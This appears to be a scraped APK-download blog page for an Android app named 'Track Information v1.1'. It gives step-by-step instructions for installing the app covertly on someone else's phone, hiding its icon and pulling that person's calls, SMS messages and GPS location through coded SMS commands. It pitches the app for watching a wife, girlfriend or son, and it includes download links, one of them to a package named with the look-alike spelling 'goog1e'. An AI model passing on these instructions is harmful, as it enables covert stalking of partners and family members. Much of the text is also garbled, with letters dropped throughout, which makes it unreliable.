/Track Inmation v1.1 Ҩ
Requirements By Download Apk Files | Android Apps | Android Market | Mandroidapk.blogspot.com: Android 2.0 higher Ҩ
Requirements By Download Apk Files | Android Apps | Android Market | Mandroidapk.blogspot.com: T app gars inmation ab phone ls, SMS location points. Ҩ

Ҩ T app gars inmation ab phone ls, SMS location points. Such inmation not send to any external server. It stored mobile device. To retrieve such info just send a SMS a given t (see below)Where my wife? Ҩ Where my phone? Ҩ Who l my boyfriend? Ҩ Where my son? SMSs does he send? Ҩ SMS sent my girlfriend? Ҩ etc…. Ҩ INSTRUCTIONS: Ҩ 1) must install t app phone want to track. Ҩ 2) Turn off mobile phone (reboot) Ҩ 3) Send a SMS from phone to application installed. Ҩ Application gars inmation ab follow activities: Ҩ Phone ls incom / going
SMS t messages incom / going
Phone location GPS coordinates ( address) Ҩ Just install ( PHONE WANT TO TRACK) it reboot phone, no icon will appear. Ҩ order to obtain inmation just send a SMS, to phone install program, t (pay attention to chars including :) Ҩ !!#INFO#!!-:
nombre@email.com Ҩ e-mail address. an e-mail will be send Ҩ track inmation Ҩ !!#LOC#!!-:
nombre@email.com Ҩ to obtain current position GPS/address(if possible) of phone. Ҩ More info Ҩ Ҩ
https://play.google.com/store/apps/d...ervices.goog1e Ҩ http://www.directmirror.com/files/0GQQMSJB